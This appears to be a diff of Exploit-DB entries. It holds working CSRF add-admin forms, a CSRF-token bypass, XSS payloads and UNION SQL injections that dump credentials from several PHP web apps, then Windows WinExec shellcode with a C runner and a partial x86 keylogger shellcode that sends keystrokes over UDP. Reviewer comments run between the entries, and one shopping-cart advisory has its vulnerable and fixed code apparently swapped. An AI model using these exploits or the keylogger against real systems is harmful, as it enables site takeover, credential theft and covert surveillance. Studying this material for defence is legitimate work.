2.In administration web department interface (need normal user login) :
http://192.168.1.112/phptelephonedirectory/administration.php?pageaction=newdepartment&subaction=submit&departmentname=</select><svg/onload=alert(1)><select>
# 0x02 CSRF (add Super user)
---
In http://192.168.1.103/csrf.html :
<!DOCTYPE html>
<html>
<body>
<form action="http://192.168.1.112/phptelephonedirectory/administration.php" method="POST">
<input name="pageaction" value="saveuser" type="hidden" />
<input name="subaction" value="submit" type="hidden" />
<input name="username" value="larry_csrf" type="hidden" />
<input name="password" value="larry_csrf" type="hidden" />
<input name="userfullname" value="larry_csrf" type="hidden" />
<input name="accesslevel" value="Super" type="hidden" />
<input name="userstatus" value="active" type="hidden" />
<input name="mysubmit" value="submit" type="submit" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
* Thanks to Besim *
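Review bot: The stored-XSS PoCs present `pageaction=newcontact&subaction=submit` and `pageaction=newdepartment&subaction=submit` as plain GET URLs, which, if accurate, means administration.php performs writes over GET — the add-Super-user CSRF in 0x02 could then be delivered with a single `<img src="...">` rather than the auto-submitting form, and the advisory should say so because it removes the need for JavaScript. The advisory gives no software version and no remediation; recommend adding the tested version and a fix section covering a per-session anti-CSRF token validated on every write action, rejecting GET for state-changing actions, and htmlspecialchars() on `key` and every contact/department field at render time. The lab addresses 192.168.1.112 and 192.168.1.103 should be replaced with placeholders such as `http://TARGET/` and `http://ATTACKER/`.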

platforms/php/webapps/40553.txt Executable file

@ -0,0 +1,249 @@
# Exploit Title: Subrion CMS 4.0.5 - CSRF Bypass to Persistent XSS and Add-Admin
# Date: 15-10-2016
# Software Link: http://www.subrion.org/download/
# Vendor: http://www.subrion.org
# Google Dork: "Powered by Subrion CMS"
# Exploit Author: Ahsan Tahir
# Contact: https://twitter.com/AhsanTahirAT | https://facebook.com/ahsantahiratofficial
# Website: www.ahsantahir.net
# Category: webapps
# Version: 4.0.5
# Tested on: [Kali Linux 2.0 | Windows 8.1]
# Email: mrahsan1337@gmail.com
[+] CSRF bypass to Persistent XSS
1. Description
There was an Anti-CSRF token while adding a post in Subrion CMS v4.0.5, named with paramater '__st', but it can be bypassed if we enter
the same number of characters in the CSRF token (for e.g XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX), then the CSRF protection will be bypassed
means, if we craft a malicious HTML web page, we can trick the admin/vicitm to visit a website, and after he/she visits the website,
a blog post will be created with a tag like this: "</title><script>alert(document.domain);</script>" and now the XSS can be executed
here: http://localhost/[SubrionPATH]/tag/title-script-alert-document-domain-script/
2. Proof of Concept (CSRF to Persistent XSS)
Login to your subrion CMS as admin, visit a webpage with the below HTML code, and click on submit request, a new post named
"Hacked by Ahsan" will be created, with a tag "</title><script>alert(document.domain);</script>", means that we exploited
CSRF sucessfully!
XSS will execute here: http://localhost/[SubrionPATH]/tag/title-script-alert-document-domain-script/
[!] PoC Code:
<html>
<!-- CSRF PoC -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/subi/admin/blog/add/", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------292766351574");
xhr.withCredentials = true;
var body = "-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"__st\"\r\n" +
"\r\n" +
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"title\"\r\n" +
"\r\n" +
"Hacked by Ahsan Tahir\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"alias\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"body\"\r\n" +
"\r\n" +
"\x3cp\x3eHacked by Ahsan Tahir\x3c/p\x3e\r\n" +
"\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"tags\"\r\n" +
"\r\n" +
"\x3c/title\x3e\x3cscript\x3ealert(document.domain);\x3c/script\x3e\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"v[image]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"image\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"owner\"\r\n" +
"\r\n" +
"Administrator (emailofadmin@gmail.com)\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"member_id\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"date_added\"\r\n" +
"\r\n" +
"2016-10-15 04:41\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"status\"\r\n" +
"\r\n" +
"active\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"save\"\r\n" +
"\r\n" +
"Add\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"goto\"\r\n" +
"\r\n" +
"list\r\n" +
"-----------------------------292766351574--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
----------------------------------------------------------------------------------------------------------------------
[+] Add-Admin CSRF
1. Description
There was an Anti-CSRF token while adding an admin in Subrion CMS v4.0.5, named with paramater '__st', but it can be bypassed if we enter
the same number of characters in the CSRF token (for e.g XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX), then the CSRF protection will be bypassed
means, if we craft a malicious HTML web page, we can trick the admin/vicitm to visit a website, and after he/she visits the website,
a new admin will be created with an email which is controled by attacker, means now the attacker have full administration over the
Subrion CMS Blog!
2. Proof of Concept
Login to your subrion CMS as admin, visit a webpage with the below HTML code, and click on submit request, a new admin named
"Haxor" will be created, with email "ahsan@ahsan.py", means that we exploited the CSRF sucessfully, and now the attacker
has full control over the subrion blog!
[!] PoC Code:
<html>
<!-- CSRF PoC -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/subi/admin/members/add/", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------2573679013209");
xhr.withCredentials = true;
var body = "-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"__st\"\r\n" +
"\r\n" +
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"username\"\r\n" +
"\r\n" +
"haxor\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"fullname\"\r\n" +
"\r\n" +
"Craxor\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"email\"\r\n" +
"\r\n" +
"ahsan@ahsan.py\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"_password\"\r\n" +
"\r\n" +
"ahsan123\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"_password2\"\r\n" +
"\r\n" +
"ahsan123\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"usergroup_id\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"v[avatar[]]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"avatar[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"website\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"phone\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"biography\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"facebook\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"twitter\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"gplus\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"linkedin\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"sponsored\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"featured\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"featured_end\"\r\n" +
"\r\n" +
"2016-11-15 04:54\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"status\"\r\n" +
"\r\n" +
"active\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"save\"\r\n" +
"\r\n" +
"Add\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"goto\"\r\n" +
"\r\n" +
"list\r\n" +
"-----------------------------2573679013209--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
Credits & Authors:
==================
Ahsan Tahir - [https://twitter.com/AhsanTahirAT]
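Review bot: Neither description states why a same-length `__st` value passes; the sentence "it can be bypassed if we enter the same number of characters in the CSRF token" implies the token is checked for length only, but that is an inference and the advisory gives no root cause, fixed version, or remediation. A short closing paragraph would make it actionable for defenders: the server should compare the submitted `__st` against the session-stored token by value (PHP's `hash_equals`), and the `tags` field should be HTML-encoded on output, since the same PoC shows it rendered unescaped under `/tag/`. Both "Description" paragraphs also misspell "vicitm" and "sucessfully", and the second one "controled".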

75
platforms/php/webapps/40554.txt Executable file

@ -0,0 +1,75 @@
# Exploit Title: PHP Image Database - Multiple Vulnerabilities
# Date: 2016-10-16
# Exploit Author: larrycompress
# Contact: larrycompress@gmail.com
# Type: webapps
# Platform: PHP
# Vendor Homepage: http://www.pagereactions.com/product.php?pku=3
# Software Link: http://www.pagereactions.com/downloads/phpimagedatabase.zip
----------------------------------------------------------------------------
POC as follows :
# 0x00 Reflected XSS
---
1.In public search :
http://192.168.1.112/phpimagedatabase/index.php?dateyear=<svg/onload=alert(1)>&key=<svg/onload=alert(2)>
2.In administration web interface (need normal user login) :
http://192.168.1.112/phpimagedatabase/administration.php?dateyear=<svg/onload=alert(1)>&key=<svg/onload=alert(2)>
# 0x01 Stored XSS
---
1.In administration web images interface (need normal user login) :
http://192.168.1.112/phpimagedatabase/administration.php
?pageaction=newimage
&MAX_FILE_SIZE=1000000
&subaction=submit
&dateday=16
&datemonthnewedit=10
&dateyearnewedit=2016
&title=<svg/onload=alert(1)>
&caption=<svg/onload=alert(2)>
&keywordtags=<svg/onload=alert(3)>
&photographer=<svg/onload=alert(4)>
&categorynewedit=
&publish=active
2.In administration web categories interface (need administrator user login) :
http://192.168.1.112/phpimagedatabase/administration.php?pageaction=newcategory&subaction=submit&categoryname=</select><svg/onload=alert(1)><select>
# 0x02 CSRF (add Super user)
---
In http://192.168.1.103/csrf.html :
<!DOCTYPE html>
<html>
<body>
<form action="http://192.168.1.112/phpimagedatabase/administration.php" method="POST">
<input name="pageaction" value="saveuser" type="hidden" />
<input name="subaction" value="submit" type="hidden" />
<input name="username" value="larry_csrf" type="hidden" />
<input name="password" value="larry_csrf" type="hidden" />
<input name="userfullname" value="larry_csrf" type="hidden" />
<input name="accesslevel" value="Super" type="hidden" />
<input name="userstatus" value="active" type="hidden" />
<input name="mysubmit" value="submit" type="submit" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
* Thanks to Besim *
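Review bot: The header block has no "Version" line and the advisory ends without a remediation section; the same applies to 40559.txt below and to the PHP Telephone Directory write-up above, whose section starts before this view. Every reflected and stored XSS item here reduces to request parameters echoed without output encoding, and the CSRF item to a state-changing `administration.php` POST with no token, so a closing "Fix" paragraph naming `htmlspecialchars(..., ENT_QUOTES)` on output and a per-session anti-CSRF token would cover all three sections. The CSRF section also omits which privilege the victim's session needs for `accesslevel=Super` to be accepted, while the XSS items state their login requirement explicitly.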

51
platforms/php/webapps/40555.txt Executable file

@ -0,0 +1,51 @@
# Exploit Title.............. Simple Shopping Cart Application SQL Injection
# Google Dork................ inurl:"product-details.php?prodid=" "Designed by FBC Students"
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/php/10181/simple-shopping-cart-application-php-mysql.html
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/tyron69/ecommerce_0.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in shop/product-details.php
-------------------------------
----snip----
$prodID = intval($_GET['prodid']);
if(!empty($prodID)){
$sqlSelectSpecProd = mysql_query("select * from products where id = '$prodID'") or die(mysql_error());
$getProdInfo = mysql_fetch_array($sqlSelectSpecProd);
$prodname= $getProdInfo["Product"];
----snip----
Example exploitation
--------------------
http://server/shop/product-details.php?prodid=-80%27%20union%20select%201,2,concat(username,0x3a,password),4,version(),user()%20from%20user--+
How to fix
----------
Simple method's use the php function intval.
For example
$prodID = $_GET['prodid'];
if(!empty($prodID)){
$sqlSelectSpecProd = mysql_query("select * from products where id = '$prodID'") or die(mysql_error());
$getProdInfo = mysql_fetch_array($sqlSelectSpecProd);
$prodname= $getProdInfo["Product"];
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/php/10181/simple-shopping-cart-application-php-mysql.html
http://php.net/manual/en/function.intval.php
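Review bot: The snippet labelled as the vulnerable code already reads `$prodID = intval($_GET['prodid']);`, while the snippet under "How to fix" drops `intval`, so the two appear swapped; as printed, the `prodid=-80'...` request would be reduced to `-80` before reaching the query. Either the audit snippet should read `$prodID = $_GET['prodid'];` and the fix `$prodID = intval($_GET['prodid']);`, or the claim needs a different explanation. Independently of that, `intval` closes the hole only because `id` is numeric; the durable fix is a prepared statement via mysqli/PDO, since the `mysql_*` functions shown are deprecated and `or die(mysql_error())` discloses query errors to the client. 40558.txt has the same remediation gap and the same error-disclosure pattern.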


@ -0,0 +1,58 @@
*=========================================================================================================
# Exploit Title: PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin)
# Author: Meryem AKDOĞAN
# Google Dork: -
# Date: 16/10/2016
# Type: webapps
# Platform : PHP
# Vendor Homepage: http://newsphp.sourceforge.net
# Software Link: https://sourceforge.net/projects/newsphp/
# Version: 1.3.0
*=========================================================================================================
DETAILS
========================================
PHP NEWS 1.3.0 versions is vulnerable to CSRF attack (No CSRF token in
place) meaning that if an admin user can be tricked to visit a crafted URL
created
by attacker (via spear phishing/social engineering), a form will be
submitted to (http://sitename/path/index.php) that will change admin
password.
Once exploited, the attacker can login to the admin panel using the
username and the password he posted in the form.
RISK
========================================
Attacker can change admin password with this vulnerablity
TECHNICAL DETAILS & POC
========================================
<html>
<!— CSRF PoC —>
<body>
<form action="
http://site_name/phpnews/index.php?action=modifynewsposter3" method="POST">
<input type="hidden" name="id" value="7" />
<input type="hidden" name="newusername" value="meryem akdogan" />
<input type="hidden" name="username" value="meryem" />
<input type="hidden" name="password" value="meryem123." />
<input type="hidden" name="password2" value="meryem123." />
<input type="hidden" name="email" value="b&#64;gmail&#46;com" />
<input type="hidden" name="language" value="en&#95;GB" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
========================================
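Review bot: The title says "Add Admin", but DETAILS, RISK and the PoC describe modifying an existing poster (`action=modifynewsposter3` with a fixed `id` of 7), which overwrites that account's username and password rather than creating an account; the title and the RISK line should agree on which it is, and the `id` value presumably depends on the installation, which the text should say. The comment at `<!— CSRF PoC —>` uses em dashes, so it is not a well-formed HTML comment; `<!-- CSRF PoC -->` is the intended form. The "created / by attacker" line break in DETAILS splits a sentence mid-clause.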

45
platforms/php/webapps/40558.txt Executable file

@ -0,0 +1,45 @@
# Exploit Title.............. School Full CBT SQL Injection
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/node/9859
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/fimo4real1992/cbt_by_ajijola_femi.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in /show.php
-------------------------------
----snip----
$get = $_GET['show'];
$result= mysql_query("select * from studentreg WHERE id=$get")or die(mysql_error());
----snip----
Example exploitation
--------------------
http://server/path_to_webapp/show.php?show=-1%20union%20select%201,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,user(),database(),31,32%20from%20adminlogin--+
How to fix
----------
Simple method's use the php function intval.
For example
$get = intval($_GET['show']);
$result= mysql_query("select * from studentreg WHERE id=$get")or die(mysql_error());
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/node/9859
http://php.net/manual/en/function.intval.php

85
platforms/php/webapps/40559.txt Executable file

@ -0,0 +1,85 @@
# Exploit Title: PHP Business Directory - Multiple Vulnerabilities
# Date: 2016-10-16
# Exploit Author: larrycompress
# Contact: larrycompress@gmail.com
# Type: webapps
# Platform: PHP
# Vendor Homepage: http://www.pagereactions.com/product.php?pku=4
# Software Link: http://www.pagereactions.com/downloads/phpbusinessdirectory.zip
--------------------------------------------------------------------------------
POC as follows :
# 0x00 Reflected XSS
---
1.In public search :
http://192.168.1.112/phpbusinessdirectory/index.php?key=<svg/onload=alert(1)>&location=<svg/onload=alert(2)>
2.In administration web interface (need normal user login) :
http://192.168.1.112/phpbusinessdirectory/administration.php?key=<svg/onload=alert(1)>&location=<svg/onload=alert(2)>
# 0x01 Stored XSS
---
1.In administration web directory interface (need normal user login) :
http://192.168.1.112/phpbusinessdirectory/administration.php
?pageaction=newsavebusiness
&subaction=submit
&businessname=<script>alert(1)</script>
&slogan=<script>alert(2)</script>
&businesslicence=<script>alert(3)</script>
&address=<script>alert(4)</script>
&city=<script>alert(5)</script>
&suburb=<script>alert(6)</script>
&businessstate=<script>alert(7)</script>
&country=<script>alert(8)</script>
&zippostcode=<script>alert(9)/*
&telephone1=*/</script><script>alert(10)</script>
&telephone2=<script>alert(11)</script>
&mobilecell=<script>alert(12)</script>
&fax=<script>alert(13)</script>
&email=<script>alert(14)</script>
&website=<script>alert(15)</script>
&socialmedia1=<script>alert(16)</script>
&socialmedia2=<script>alert(17)</script>
&socialmedia3=<script>alert(18)</script>
&productservice=<script>alert(19)</script>
&manager=<script>alert(20)</script>
&paymentsaccepted=<script>alert(21)</script>
2.In administration web categories interface (need administrator user login) :
http://192.168.1.112/phpbusinessdirectory/administration.php?pageaction=savecategory&subaction=submit&categoryname=</select><svg/onload=alert(1)><select>
# 0x02 CSRF (add Super user)
---
In http://192.168.1.103/csrf.html :
<!DOCTYPE html>
<html>
<body>
<form action="http://192.168.1.112/phpbusinessdirectory/administration.php" method="POST">
<input name="pageaction" value="saveuser" type="hidden" />
<input name="subaction" value="submit" type="hidden" />
<input name="username" value="larry_csrf" type="hidden" />
<input name="password" value="larry_csrf" type="hidden" />
<input name="userfullname" value="larry_csrf" type="hidden" />
<input name="accesslevel" value="Super" type="hidden" />
<input name="userstatus" value="active" type="hidden" />
<input name="mysubmit" value="submit" type="submit" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
* Thanks to Besim *


@ -0,0 +1,144 @@
/*
# Title : Windows x64 WinExec() shellcode
# Date : 15-10-2016
# Author : Roziul Hasan Khan Shifat
# size : 93 bytes
# Tested on : Windows 7 Ultimate x64
*/
/*
Disassembly of section .text:
0000000000000000 <_start>:
0: 99 cltd
1: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax
6: 48 8b 40 18 mov 0x18(%rax),%rax
a: 48 8b 70 10 mov 0x10(%rax),%rsi
e: 48 ad lods %ds:(%rsi),%rax
10: 48 8b 30 mov (%rax),%rsi
13: 48 8b 7e 30 mov 0x30(%rsi),%rdi
17: 48 31 db xor %rbx,%rbx
1a: 48 31 f6 xor %rsi,%rsi
1d: 8b 5f 3c mov 0x3c(%rdi),%ebx
20: 48 01 fb add %rdi,%rbx
23: b2 88 mov $0x88,%dl
25: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
28: 48 01 fb add %rdi,%rbx
2b: 8b 73 1c mov 0x1c(%rbx),%esi
2e: 48 01 fe add %rdi,%rsi
31: 99 cltd
32: 66 ba 27 05 mov $0x527,%dx
36: 8b 04 96 mov (%rsi,%rdx,4),%eax
39: 48 01 f8 add %rdi,%rax
3c: eb 17 jmp 55 <c>
000000000000003e <exec>:
3e: 59 pop %rcx
3f: 99 cltd
40: 48 ff c2 inc %rdx
43: ff d0 callq *%rax
45: 99 cltd
46: 66 ba 29 01 mov $0x129,%dx
4a: 8b 04 96 mov (%rsi,%rdx,4),%eax
4d: 48 01 f8 add %rdi,%rax
50: 48 31 c9 xor %rcx,%rcx
53: ff d0 callq *%rax
0000000000000055 <c>:
55: e8 e4 ff ff ff callq 3e <exec>
5a: 63 6d 64 movslq 0x64(%rbp),%ebp
...
*/
/*
bits 64
section .text
global _start
_start:
cdq
mov rax,[gs:rdx+0x60] ;PEB
mov rax,[rax+0x18] ;PEB.Ldr
mov rsi,[rax+0x10] ;PEB.Ldr->InMemOrderModuleList
lodsq
mov rsi,[rax]
mov rdi,[rsi+0x30] ;kernel32.dll base address
xor rbx,rbx
xor rsi,rsi
mov ebx,[rdi+0x3c] ;elf_anew
add rbx,rdi ;PE HEADER
mov dl,0x88
mov ebx,[rbx+rdx] ;DataDirectory->VirtualAddress
add rbx,rdi ;IMAGE_EXPORT_DIRECTORY
mov esi,[rbx+0x1c] ;AddressOfFunctions
add rsi,rdi
cdq
mov dx,1319 ;Ordinal of WinExec()
mov eax,[rsi+rdx*4]
add rax,rdi ;rax=WinExec()
;WinExec("cmd",1)
jmp c
exec:
pop rcx
cdq
inc rdx
call rax
cdq
mov dx,297
mov eax,[rsi+rdx*4]
add rax,rdi ;rax=FatalExit()
;FatalExit(0)
xor rcx,rcx
call rax
c:
call exec
db 'cmd',0,0
*/
#include<stdio.h>
#include<string.h>
#include<windows.h>
char shellcode[]="\x99\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\x48\x31\xdb\x48\x31\xf6\x8b\x5f\x3c\x48\x01\xfb\xb2\x88\x8b\x1c\x13\x48\x01\xfb\x8b\x73\x1c\x48\x01\xfe\x99\x66\xba\x27\x05\x8b\x04\x96\x48\x01\xf8\xeb\x17\x59\x99\x48\xff\xc2\xff\xd0\x99\x66\xba\x29\x01\x8b\x04\x96\x48\x01\xf8\x48\x31\xc9\xff\xd0\xe8\xe4\xff\xff\xff\x63\x6d\x64";
main()
{
int len=strlen(shellcode);
DWORD l=0;
printf("shellcode length %d bytes\n",len );
VirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l);
(* (int(*)()) shellcode ) ();
}
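Review bot: `main()` relies on implicit int, which C99 removed and C++ never allowed, and the `VirtualProtect` result is ignored, so a failed protection change falls straight through to the indirect call; `int main(void)` and `if (!VirtualProtect(shellcode, len, PAGE_EXECUTE_READWRITE, &l)) return 1;` fix both. `strlen(shellcode)` is right only while the byte string contains no NUL; `size_t len = sizeof(shellcode) - 1;` states the intent directly and is what the "93 bytes" in the header refers to. In the disassembly comment, the final `movslq 0x64(%rbp),%ebp` at offset 0x5a is the `'cmd'` string being decoded as an instruction, and a `; string data, not code` remark there would spare the reader a double take. The comment `;elf_anew` in the NASM listing should read `;e_lfanew`.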


@ -0,0 +1,266 @@
; Exploit Title: x86 windows shellcode - keylogger reverse udp - 493 bytes
; Date: Fri Oct 13 12:58:35 GMT 2016
; Exploit Author: Fugu
; Vendor Homepage: www.microsoft.com
; Version: all win
; Tested on: Windows 7(x86), 8.1(x86), 10(x86_64)
; Note: it will write to single byte payload udp packets to host.
; keystrokes are written in format: "Virtual-Key Codes", from
; msdn.microsoft.com website
section .bss
section .data
section .text
global _start
_start:
cld ; 00000000 FC
call dword loc_88h ; 00000001 E882000000
pushad ; 00000006 60
mov ebp,esp ; 00000007 89E5
xor eax,eax ; 00000009 31C0
mov edx,[fs:eax+0x30] ; 0000000B 648B5030
mov edx,[edx+0xc] ; 0000000F 8B520C
mov edx,[edx+0x14] ; 00000012 8B5214
loc_15h:
mov esi,[edx+0x28] ; 00000015 8B7228
movzx ecx,word [edx+0x26] ; 00000018 0FB74A26
xor edi,edi ; 0000001C 31FF
loc_1eh:
lodsb ; 0000001E AC
cmp al,0x61 ; 0000001F 3C61
jl loc_25h ; 00000021 7C02
sub al,0x20 ; 00000023 2C20
loc_25h:
ror edi,byte 0xd ; 00000025 C1CF0D
add edi,eax ; 00000028 01C7
loop loc_1eh ; 0000002A E2F2
push edx ; 0000002C 52
push edi ; 0000002D 57
mov edx,[edx+0x10] ; 0000002E 8B5210
mov ecx,[edx+0x3c] ; 00000031 8B4A3C
mov ecx,[ecx+edx+0x78] ; 00000034 8B4C1178
jecxz loc_82h ; 00000038 E348
add ecx,edx ; 0000003A 01D1
push ecx ; 0000003C 51
mov ebx,[ecx+0x20] ; 0000003D 8B5920
add ebx,edx ; 00000040 01D3
mov ecx,[ecx+0x18] ; 00000042 8B4918
loc_45h:
jecxz loc_81h ; 00000045 E33A
dec ecx ; 00000047 49
mov esi,[ebx+ecx*4] ; 00000048 8B348B
add esi,edx ; 0000004B 01D6
xor edi,edi ; 0000004D 31FF
loc_4fh:
lodsb ; 0000004F AC
ror edi,byte 0xd ; 00000050 C1CF0D
add edi,eax ; 00000053 01C7
cmp al,ah ; 00000055 38E0
jnz loc_4fh ; 00000057 75F6
add edi,[ebp-0x8] ; 00000059 037DF8
cmp edi,[ebp+0x24] ; 0000005C 3B7D24
jnz loc_45h ; 0000005F 75E4
pop eax ; 00000061 58
mov ebx,[eax+0x24] ; 00000062 8B5824
add ebx,edx ; 00000065 01D3
mov cx,[ebx+ecx*2] ; 00000067 668B0C4B
mov ebx,[eax+0x1c] ; 0000006B 8B581C
add ebx,edx ; 0000006E 01D3
mov eax,[ebx+ecx*4] ; 00000070 8B048B
add eax,edx ; 00000073 01D0
mov [esp+0x24],eax ; 00000075 89442424
pop ebx ; 00000079 5B
pop ebx ; 0000007A 5B
popad ; 0000007B 61
pop ecx ; 0000007C 59
pop edx ; 0000007D 5A
push ecx ; 0000007E 51
jmp eax ; 0000007F FFE0
loc_81h:
pop edi ; 00000081 5F
loc_82h:
pop edi ; 00000082 5F
pop edx ; 00000083 5A
mov edx,[edx] ; 00000084 8B12
jmp short loc_15h ; 00000086 EB8D
loc_88h:
pop ebp ; 00000088 5D
push dword 0x3233 ; 00000089 6833320000
push dword 0x5f327377 ; 0000008E 687773325F
push esp ; 00000093 54
push dword 0x726774c ; 00000094 684C772607
call ebp ; 00000099 FFD5
mov eax,0x190 ; 0000009B B890010000
sub esp,eax ; 000000A0 29C4
push esp ; 000000A2 54
push eax ; 000000A3 50
push dword 0x6b8029 ; 000000A4 6829806B00
call ebp ; 000000A9 FFD5
push byte +0x10 ; 000000AB 6A10
jmp dword loc_1ceh ; 000000AD E91C010000
loc_b2h:
push dword 0x803428a9 ; 000000B2 68A9283480
call ebp ; 000000B7 FFD5
lea esi,[eax+0x1c] ; 000000B9 8D701C
xchg esi,esp ; 000000BC 87F4
pop eax ; 000000BE 58
xchg esp,esi ; 000000BF 87E6
mov esi,eax ; 000000C1 89C6
push dword 0x6c6c ; 000000C3 686C6C0000
push dword 0x642e7472 ; 000000C8 6872742E64
push dword 0x6376736d ; 000000CD 686D737663
push esp ; 000000D2 54
push dword 0x726774c ; 000000D3 684C772607
call ebp ; 000000D8 FFD5
jmp dword loc_1e3h ; 000000DA E904010000
loc_dfh:
push dword 0xd1ecd1f ; 000000DF 681FCD1E0D
call ebp ; 000000E4 FFD5
xchg ah,al ; 000000E6 86E0
ror eax,byte 0x10 ; 000000E8 C1C810
inc eax ; 000000EB 40
inc eax ; 000000EC 40
push esi ; 000000ED 56
push eax ; 000000EE 50
mov esi,esp ; 000000EF 89E6
xor eax,eax ; 000000F1 31C0
push eax ; 000000F3 50
push eax ; 000000F4 50
push eax ; 000000F5 50
push eax ; 000000F6 50
inc eax ; 000000F7 40
inc eax ; 000000F8 40
push eax ; 000000F9 50
push eax ; 000000FA 50
push dword 0xe0df0fea ; 000000FB 68EA0FDFE0
call ebp ; 00000100 FFD5
mov edi,eax ; 00000102 89C7
loc_104h:
push byte +0x10 ; 00000104 6A10
push esi ; 00000106 56
push edi ; 00000107 57
push dword 0x6174a599 ; 00000108 6899A57461
call ebp ; 0000010D FFD5
test eax,eax ; 0000010F 85C0
jz loc_122h ; 00000111 740F
dec dword [esi+0x8] ; 00000113 FF4E08
jnz loc_104h ; 00000116 75EC
xor eax,eax ; 00000118 31C0
